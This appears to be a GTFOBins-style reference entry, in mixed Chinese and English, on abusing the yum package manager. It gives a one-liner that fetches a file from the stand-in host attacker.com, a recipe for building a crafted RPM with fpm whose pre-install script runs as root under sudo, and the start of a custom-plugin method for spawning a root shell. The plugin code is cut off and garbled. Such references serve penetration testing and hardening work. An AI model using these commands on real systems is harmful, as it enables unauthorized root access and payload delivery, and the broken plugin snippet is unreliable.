.. / yum

file-download

下载远程文件。

• Fetch a remote file via HTTP GET request. The file on the remote host must have an extension of .rpm, the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in /var/tmp, for example /var/tmp/yum-root-cR0O4h/.

  RHOST=attacker.com
  RFILE=file_to_get.rpm
  yum install http://$RHOST/$RFILE
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target. ``` TF=$(mktemp -d) echo 'id' > $TF/x.sh fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF ```

  sudo yum localinstall -y x-1.0-1.noarch.rpm
  

  Spawn interactive root shell by loading a custom plugin.

  TF=$(mktemp -d)
  cat >$TF/x<$TF/y.conf<$TF/y.py<